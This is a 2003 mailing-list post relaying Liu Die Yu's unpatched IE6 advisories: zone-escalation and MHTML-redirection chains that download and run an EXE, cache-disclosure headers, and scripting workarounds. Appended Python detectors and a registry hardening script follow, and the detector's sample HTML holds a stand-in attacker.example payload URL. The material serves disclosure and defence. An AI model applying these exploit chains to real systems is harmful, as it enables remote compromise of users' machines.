[windows2000] FYI: Multiple vulnerabilities in Internet Explorer

  • From: Daniel Ensor <densor@xxxxxxxxx>
  • To: "'windows2000@xxxxxxxxxxxxx'" <windows2000@xxxxxxxxxxxxx>
  • Date: Wed, 26 Nov 2003 13:35:18 -0000

Hi List

Just got this in:

Cheers

Dan
--------------------------------------------------------------------
Integralis S3 Advise .. Integralis S3 Advise .. Integralis S3 Advise
--------------------------------------------------------------------

Affected platforms:     IE 6.0 with XP SP1 and MS03-048.
Scope for attack:       Remote via hostile web page / e-mail.
Effect:                 Various up to and including remote
                        code execution leading to compromise of
                        the user's machine.
Resolution:             Disable "Active Scripting" in the
                        INTERNET zone.

A whole slew of vulnerabilities in Internet Explorer have been released by
prominent IE researcher Liu Die Yu. These affect IE 6 with all the latest
patches applied. In other words, there are no patches available for any of
these problems. This presents a "vulnerability window" in which many
desktops will remain vulnerable unless remedial action is taken immediately.


Pete Philips
pete@xxxxxxxxxxxxxxxxxxx

-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

New "Clean" IE Remote Compromise

[tested]
OS:Win2k3,CN version
IE: with MS03-048 installed.

OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
By combining several vulnerabilities in Internet Explorer, an attacker can
execute his EXE file on the victim's system. ("Clean" means: there is no old
published vulnerability involved in this exploit.)

[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.html
(runs harmless demonstration executable)

[technical details]
First, use MhtRedirParsesLocalFile to parse a local file in an IFRAME (Liu
Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile).
Then, use BackToFramedJpu to reach the MYCOMPUTER zone
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu).
At last, in the MYCOMPUTER security zone, use MhtRedirLaunchInetExe to download
the payload EXE file and execute it (Liu Die Yu's
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe).

[Workaround]
Disable Active Scripting in INTERNET zone.

[Greetings]
greetings to:
Drew Copley, dror, guninski and mkill.

-----
all mentioned resources can always be found at UMBRELLA.MX.TC

[people]
LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"

[message]
A wise man learns from others' mistakes; a fool learns from his own.

[Employment]
I would like to work professionally as a security researcher/bug finder.

See my resume at my site. I am very eager to work, flexible, and extremely
productive. I have a top notch resume, with credentials from leading bug
finders. I am willing to work per contract, relocate, or telecommute.

[Give a Hand]
I haven't got a job as a security researcher yet and my family don't support
my security work - so, I don't have a computer of my own. Please consider
donating at: http://clik.to/donatepc


-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

MHTML Redirection Leads to Downloading EXE and Executing

[tested]
OS:Win2k3,CN version
IE: with MS03-048 installed.

OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
A vulnerability in Internet Explorer has been found: any attacker that can
reach the MYCOMPUTER security zone (a.k.a. the local zone) is able to download
his EXE file and execute it.

[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaunchInetExe-Demo.zip

[technical details]
There is a feature in Internet Explorer when it tries to retrieve a file
embedded in an MHT file, like:
mhtml:[Mhtml_File_Url]![Original_Resource_Url]
If [Original_Resource_Url] cannot be retrieved from [Mhtml_File_Url], IE
will try to download [Original_Resource_Url] and return the downloaded
content.

It is like an HTTP redirection.

And CODEBASE execution is a URL-based security check.
(Liu Die Yu's http://continue.to/trie )

So, in the MYCOMPUTER security zone, point the CODEBASE property of an OBJECT
tag with an unused CLSID to:
mhtml:file:///C:\No_SUCH_MHT.MHT![Attacker_PayloadEXE_Url]
and then IE will download [Attacker_PayloadEXE_Url] and execute it.

[Workaround]
Disable Active Scripting in INTERNET zone.



-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

BackToFramedJpu - a successor of BackToJpu attack

[tested]
OS:Win2k3,CN version
IE: with MS03-048 installed.

OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
A cross-zone scripting vulnerability has been found in Internet Explorer. If
a webpage contains a subframe (either a FRAME tag or an IFRAME tag), its
security zone may be compromised.

[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu/BackToFramedJpu-MyPage.htm

[technical details]
After applying the MS03-048 patch, javascript-protocol URLs are no longer
stored in the URL history list, which means the classical "javascript-protocol
URL in history" attack doesn't work any more. (Liu Die Yu's
http://www.safecenter.net/UMBRELLAWEBV4/BackMyParent2/index.html)

However, if an attacker does the following things:
navigate a sub-frame in the victim document to a javascript-protocol URL
(first, navigate the sub-frame to the attacker's page, and then navigate the
sub-frame to a javascript-protocol URL),
then navigate the top window away,
and at last navigate back ("history.back()"),

the javascript-protocol URL will be loaded by the top window (victim
document) and the script in the javascript-protocol URL will be executed in the
security zone of the victim document - a.k.a. cross-site/zone/domain scripting.

[Workaround]
Disable Active Scripting in INTERNET zone.



-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

HijackClickV2 - a successor of HijackClick attack

[tested]
OS:Win2k3,CN version
IE: with MS03-048 installed.

OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
After applying MS03-048, the original HijackClick exploit doesn't work any
more. With method caching (a.k.a. "SaveRef"), HijackClick works again.

[demo]
There is a harmless demo:
http://www.safecenter.net/UMBRELLAWEBV4/HijackClickV2/HijackClickV2-MyPage.htm

[technical details]
After applying MS03-048, the original HijackClick exploit doesn't work any
more (Liu Die Yu's
http://www.safecenter.net/UMBRELLAWEBV4/HijackClick/HijackClick-MyPage.HTM)
because window.moveBy is inaccessible. A method caching attack can make
window.moveBy accessible again.

[Workaround]
Disable Active Scripting in INTERNET zone.



-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

Invalid ContentType may disclose cache directory

[tested]
OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
The problem lies in the download function of Internet Explorer. This can be
exploited by malicious web pages to get the cache directory, including the
random names.

[demo]
There are two harmless demos:
1st, online demo, powered by ASP:
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo
2nd, demo in ZIP format, powered by NETCAT:
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo.zip

[technical details]
When the CONTENTTYPE in the HTTP response is invalid and the file extension is
"HTM", the downloaded HTM file will be opened from the cache directory, in the
INTERNET security zone.

In the 1st demo, this is done by the following ASP code:
----------
' Content-Type is not a valid type/subtype media type
response.ContentType = "whocares"
' Content-Disposition asks the browser to render the body inline as test.htm
response.AddHeader "content-disposition", "inline; filename=test.htm"
----------

In the 2nd demo, this is done with the help of NETCAT.

[Workaround]
Disable Active Scripting in INTERNET zone, so HTML page opened in the cache
can't send information back to the attacker.

Note for "Invalid ContentType may disclose cache directory"

This vulnerability ("Invalid ContentType may disclose cache directory")
doesn't work on all systems. ("Invalid ContentType may disclose cache
directory", at
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/)
Please note that execdror6 and LocalZoneInCache also depend on this
vulnerability.
(execdror6: http://www.safecenter.net/UMBRELLAWEBV4/execdror6/
LocalZoneInCache: http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/)
I have spent an extraordinary amount of time on this issue and here is all I
know about it:

First, the code was verified to work on a WinXP system (Simplified Chinese
version) with all patches. Then, I sent LocalZoneInCache to HTTP-EQUIV, Dror
Shalev and the Pull for testing: it works on Dror Shalev's WinXP
machine (up-to-date) but it doesn't work on the Pull's Win2k system (because
he set the killbit for the Adodb.Stream ActiveX object). Soon after that,
HTTP-EQUIV found it does not work on his WinXP system (2-3 weeks old, with
the latest IE patch). Then, to figure out what happened, I formatted the disk
and installed Win2k3 and WinXP (both Simplified Chinese version) and then
applied the latest IE patch. Both remote compromise cases (LocalZoneInCache
and execdror6) don't work any more. At last, I reproduced both remote
compromise cases on MSIE v6 running on Simplified Chinese WinXP with the
following patches: SP1; Q828750; Q330994; Q824145 (a.k.a. MS03-048)

If you are using IE, please help me test it and send the result directly to
my mailbox. Thanks in advance.



-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

Cache Disclosure Leads to MYCOMPUTER Zone and Remote Compromise

[tested]
OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
By combining cache file disclosure and several other unpatched
vulnerabilities, a malicious INTERNET page can reach the MYCOMPUTER zone. The
demo uses Adodb.Stream to launch a remote compromise attack.

[demo]
There are two harmless demos:
Online demo, powered by ASP:
http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/LocalZoneInCache-Demo/index.html
(runs harmless demonstration executable)

[technical details]
First, place an HTML file in the IE cache directory and get its location. (Liu
Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/index.html)
Second, this HTML file can be parsed as an HTML page and treated as in the
MYCOMPUTER security zone. (Mindwarper of mlsecurity.com's
http://www.mlsecurity.com/ie/ie.htm)
(Liu Die Yu's
http://www.safecenter.net/UMBRELLAWEBV4/DblSlashForCache/DblSlashForCache-Content.htm)
At last, overwrite NOTEPAD.EXE and make IE launch it by opening a
view-source protocol URL. (HTTP-EQUIV of MALWARE's
http://www.securityfocus.com/archive/1/343521)

[Workaround]
Disable Active Scripting in INTERNET zone, so HTML page opened in the cache
can't send information back to the attacker.

[Greetings]
greetings to:
Drew Copley, dror, guninski, vadim and mkill.



-----------------------------------------------------------------
Integralis S3 Advise service

The following message is reposted complete from the original source. It has
not been modified by Integralis S3 in any way.
-----------------------------------------------------------------

IE Remote Compromise by Getting Cache Location

[tested]
OS:WinXp, CN version
Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16

[overview]
With the help of LocalZoneInCache(refer to "[technical details]" part), an
attacker can compromise a user's system even though the user has: 1.
Customized IE cache directory, 2. Applied MS03-048 patch, 3. Set killbit for
ADODB.STREAM ActiveX.

[demo]
online demo, powered by ASP:
http://www.safecenter.net/UMBRELLAWEBV4/execdror6/execdror6-Demo/index.html
(runs harmless demonstration executable)

[technical details]
execdror6 is derived from execdror5.
(Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/execdror5/)
execdror6 differs from execdror5 in that:
1st, execdror6 uses LocalZoneInCache to reach MYCOMPUTER security zone. (Liu
Die Yu's
http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/index.html)
2nd, execdror6 gets the IE cache directory directly from location.href.
(LocalZoneInCache makes the attacker's HTML page open in the cache directory.)

[Workaround]
Disable Active Scripting in INTERNET zone, so HTML page opened in the cache
can't send information back to the attacker.

[Greetings]
greetings to:
Drew Copley, dror, guninski, vadim and mkill.




------------------------------------------------------------------------
The information you receive/contained herein is to keep you aware of
developments in IT security that have general relevance to your IT systems
environment. Our objective is to provide information to you as rapidly as
possible to alert you to security threats, issues and potential solutions.
In view of the expediency of the information the solutions described will
not necessarily have been fully tested as to their applicability to your
particular environment. Hence you use this information at your sole risk and
liability. All trademarks are acknowledged as belonging to their respective
owners.
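The MhtRedirLaunchInetExe advisory above turns on one mismatch: the CODEBASE
security check is made against the mhtml: URL (whose container part is a
local file: path, so MYCOMPUTER zone), while the bytes actually fetched come
from the fallback URL after the "!" (an attacker's HTTP server). The following
Python is an added example written for this page, not code from the advisory
or from Liu Die Yu. It parses the mhtml:[container]![original] form, classifies
each half by zone, and scans constructed HTML for OBJECT tags whose CODEBASE
has a local container and a remote fallback. The scheme-to-zone mapping is a
deliberate simplification assumed here (real IE zone assignment depends on
zone settings), and the CLSIDs and host names in the sample are made up.

```python
"""Detect the mhtml: local-container / remote-fallback pattern in OBJECT
CODEBASE attributes. Added example; zone mapping is an assumption."""
import re
from urllib.parse import urlsplit

MYCOMPUTER = "MYCOMPUTER"
INTERNET = "INTERNET"
UNKNOWN = "UNKNOWN"

# OBJECT tag with a CODEBASE attribute; the tag may span several lines.
OBJECT_CODEBASE = re.compile(
    r"<object\b[^>]*?\bcodebase\s*=\s*[\"']?([^\"'\s>]+)",
    re.IGNORECASE | re.DOTALL)


def parse_mhtml_url(url):
    """Split 'mhtml:<container>!<original>' into (container, original).

    original is None when there is no '!' part. ValueError for non-mhtml URLs.
    """
    scheme, sep, rest = url.partition(":")
    if not sep or scheme.lower() != "mhtml":
        raise ValueError("not an mhtml: URL")
    container, bang, original = rest.partition("!")
    return container, (original if bang else None)


def zone_of(url):
    """Simplified scheme-to-zone classifier (assumption for this example):
    file: is the local MYCOMPUTER zone, http/https/ftp are INTERNET."""
    scheme = urlsplit(url).scheme.lower()
    if scheme == "file":
        return MYCOMPUTER
    if scheme in ("http", "https", "ftp"):
        return INTERNET
    return UNKNOWN


def mhtml_fallback_risk(url):
    """Describe the mismatch: the container decides the zone, the original
    resource decides what is downloaded when the container lacks it."""
    container, original = parse_mhtml_url(url)
    container_zone = zone_of(container)
    fallback_zone = zone_of(original) if original is not None else None
    return {
        "container": container,
        "original": original,
        "container_zone": container_zone,
        "fallback_zone": fallback_zone,
        "local_zone_with_remote_fallback": (
            container_zone == MYCOMPUTER and fallback_zone == INTERNET),
    }


def find_risky_codebase(html):
    """Return CODEBASE URLs in OBJECT tags that use a local mhtml container
    with a remote fallback, i.e. the shape the advisory describes."""
    hits = []
    for m in OBJECT_CODEBASE.finditer(html):
        url = m.group(1)
        if not url.lower().startswith("mhtml:"):
            continue
        if mhtml_fallback_risk(url)["local_zone_with_remote_fallback"]:
            hits.append(url)
    return hits


# Constructed sample page: one risky OBJECT, one ordinary CAB codebase.
SAMPLE_HTML = """<html><body>
<object classid="clsid:00000000-0000-0000-0000-000000000000"
        codebase="mhtml:file:///C:\\No_SUCH_MHT.MHT!http://attacker.example/payload.exe">
</object>
<object classid="clsid:11111111-1111-1111-1111-111111111111"
        codebase="http://vendor.example/control.cab#version=1,0,0,0"></object>
</body></html>"""

if __name__ == "__main__":
    for hit in find_risky_codebase(SAMPLE_HTML):
        print("risky CODEBASE:", hit, mhtml_fallback_risk(hit))
```

Run over intercepted HTML (a proxy log or a saved page) the scanner only
reports the local-container/remote-fallback combination, so an mhtml: URL
whose container is itself remote is left alone.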
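The "Invalid ContentType may disclose cache directory" advisory gives the
trigger as a single pair of headers: a Content-Type that is not a well-formed
media type together with a Content-Disposition of "inline" naming an .htm
file. The Python below is an added example, not the advisory's ASP demo or
anything from Liu Die Yu: it parses a raw HTTP response head, validates the
Content-Type against the RFC 2616 type/subtype token grammar, and reports the
combination so a proxy or IDS rule can flag responses shaped like the demo.
The two response samples are constructed for this example.

```python
"""Flag HTTP responses with an invalid Content-Type and an inline .htm
Content-Disposition. Added example; sample responses are constructed."""
import re

# RFC 2616 token: one or more CHARs that are not CTLs or separators.
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
# media-type = type "/" subtype *( ";" parameter )
_MEDIA_TYPE = re.compile(r"^\s*" + _TOKEN + r"/" + _TOKEN + r"\s*(;.*)?$",
                         re.DOTALL)
_FILENAME = re.compile(r"filename\s*=\s*\"?([^\";]+)\"?", re.IGNORECASE)


def content_type_is_valid(value):
    """True when the header value is a well-formed type/subtype media type."""
    return bool(_MEDIA_TYPE.match(value))


def disposition_parts(value):
    """Return (disposition_type, filename) from a Content-Disposition value;
    filename is None when no filename parameter is present."""
    dtype = value.split(";", 1)[0].strip().lower()
    m = _FILENAME.search(value)
    return dtype, (m.group(1).strip() if m else None)


def parse_headers(raw):
    """Parse a raw response (status line, headers, blank line, body) into a
    dict of lower-cased header names to values; first occurrence wins."""
    headers = {}
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:
        if not line.strip():
            break
        name, sep, val = line.partition(":")
        key = name.strip().lower()
        if sep and key not in headers:
            headers[key] = val.strip()
    return headers


def cache_disclosure_pattern(headers):
    """True when Content-Type is not a valid media type and the response is
    served inline under an .htm/.html filename (the advisory's combination)."""
    if content_type_is_valid(headers.get("content-type", "")):
        return False
    dtype, fname = disposition_parts(headers.get("content-disposition", ""))
    return (dtype == "inline" and fname is not None
            and fname.lower().endswith((".htm", ".html")))


# Constructed samples: the demo's header pair, and a benign look-alike.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: whocares\r\n"
    "Content-Disposition: inline; filename=test.htm\r\n"
    "Content-Length: 13\r\n"
    "\r\n"
    "<html></html>")
BENIGN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Disposition: inline; filename=test.htm\r\n"
    "\r\n"
    "<html></html>")

if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_RESPONSE), ("benign", BENIGN_RESPONSE)):
        print(label, "matches pattern:", cache_disclosure_pattern(parse_headers(raw)))
```

The check deliberately rejects any Content-Type lacking the type/subtype form,
which is exactly what `response.ContentType = "whocares"` in the ASP demo
produces; a bare token is not a media type.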
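Every advisory above ends with the same workaround, "Disable Active Scripting
in INTERNET zone", and the Integralis summary repeats it as the resolution.
The Python below is an added example (not from the advisory, Integralis or
Microsoft) for auditing that setting across machines from a `reg export` of
the per-user Zones key and for producing the .reg fragment that applies it.
It relies on the documented registry layout: zone 3 is the Internet zone and
URL action value 1400 is Active scripting, with 0 = enable, 1 = prompt,
3 = disable. The export text used as input is constructed for this example.

```python
"""Audit and set IE 'Active scripting' (URL action 1400) for the Internet
zone (zone 3) via .reg text. Added example; sample export is constructed."""
import re

ZONES_KEY = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones"
ACTIVE_SCRIPTING = "1400"  # URL action value name for Active scripting
STATES = {0: "enabled", 1: "prompt", 3: "disabled"}
ZONE_NAMES = {"0": "My Computer", "1": "Local intranet", "2": "Trusted sites",
              "3": "Internet", "4": "Restricted sites"}

# "[HKEY_...\<ZONES_KEY>\<n>]" section header and '"1400"=dword:xxxxxxxx' lines
_KEY_LINE = re.compile(r"^\[(HKEY_[A-Z_]+)\\" + re.escape(ZONES_KEY)
                       + r"\\(\d+)\]$")
_DWORD_LINE = re.compile(r'^"(\d+)"=dword:([0-9a-fA-F]{8})$')


def audit_active_scripting(reg_text):
    """Return {zone_number: state} for the Active scripting action in every
    zone section present in the exported .reg text."""
    result = {}
    current = None
    for line in reg_text.splitlines():
        line = line.strip()
        k = _KEY_LINE.match(line)
        if k:
            current = k.group(2)
            continue
        d = _DWORD_LINE.match(line)
        if d and current is not None and d.group(1) == ACTIVE_SCRIPTING:
            result[current] = STATES.get(int(d.group(2), 16), "unknown")
    return result


def internet_zone_scripting_disabled(reg_text):
    """True only when zone 3 explicitly carries 1400 = 3 (Disable)."""
    return audit_active_scripting(reg_text).get("3") == "disabled"


def hardening_reg(hive="HKEY_CURRENT_USER"):
    """Build .reg text that sets Active scripting to Disable in zone 3."""
    return ("Windows Registry Editor Version 5.00\r\n\r\n"
            "[%s\\%s\\3]\r\n" % (hive, ZONES_KEY)
            + '"%s"=dword:00000003\r\n' % ACTIVE_SCRIPTING)


def report(reg_text):
    """Human-readable lines, one per zone found in the export."""
    return ["zone %s (%s): Active scripting %s"
            % (z, ZONE_NAMES.get(z, "?"), state)
            for z, state in sorted(audit_active_scripting(reg_text).items())]


# Constructed export: intranet and Internet zones both with scripting enabled.
SAMPLE_EXPORT = "\r\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]",
    '"DisplayName"="Local intranet"',
    '"1400"=dword:00000000',
    "",
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]",
    '"DisplayName"="Internet"',
    '"1400"=dword:00000000',
    "",
])

if __name__ == "__main__":
    print("\n".join(report(SAMPLE_EXPORT)))
    print("Internet zone hardened:", internet_zone_scripting_disabled(SAMPLE_EXPORT))
    print(hardening_reg())
```

On the workstation the input comes from
`reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones" zones.reg`
and the generated fragment is applied with `reg import`; a zone that inherits
the default without an explicit 1400 value is reported as absent rather than
as disabled, so the audit does not silently pass on a machine that was never
touched.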
